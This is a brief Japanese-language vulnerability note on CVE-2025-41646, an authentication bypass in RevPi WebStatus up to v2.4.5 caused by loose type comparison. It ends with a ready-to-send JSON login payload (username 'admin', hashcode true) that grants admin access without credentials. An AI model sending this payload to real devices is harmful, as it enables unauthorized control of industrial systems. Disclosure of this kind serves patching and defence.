
CVE-2025-41646 - 重大な認証バイパス
CVE-2025-41646 - 重大な認証バイパス
RevPi WebStatus ≤ v2.4.5 における重大な認証バイパス脆弱性(CVE-2025-41646)により、攻撃者は弱い型比較ロジック(== vs ===)のため、有効な認証情報なしで admin としてログインできます。
以下のログインリクエストを送信します:
{
"mode": "LOGIN",
"username": "admin",
"hashcode": true
}